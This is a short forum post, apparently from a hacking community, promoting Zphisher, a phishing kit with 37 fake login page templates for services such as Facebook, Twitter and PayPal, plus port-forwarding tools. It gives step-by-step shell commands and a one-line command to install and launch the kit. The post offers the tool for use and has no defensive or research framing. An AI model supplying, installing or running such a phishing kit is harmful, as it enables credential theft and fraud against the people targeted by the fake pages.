Serafim
Advanced
		- Joined
 - 28.09.20
 
- Messages
 - 133
 
- Reaction score
 - 1,320
 
- Points
 - 93
 
 Zphisher is an upgraded form of Shellphish. The main source code is from Shellphish . But I have not fully copied it . I have upgraded it & cleared the Unnecessary Files . Zphisher has 37 Phishing Page Templates ; including Facebook , Twitter & Paypal . It also has 4 Port Forwarding Tools .
Installation:
apt update
apt install git php openssh curl -y
git clone htr-tech/zphisher
cd zphisher
chmod +x zphisher.sh
bash zphisher.sh
Or ; Use Single Command
Downloadapt update && apt install git php curl openssh -y && git clone htr-tech/zphisher && cd zphisher && chmod +x zphisher.sh && bash zphisher.sh
				
		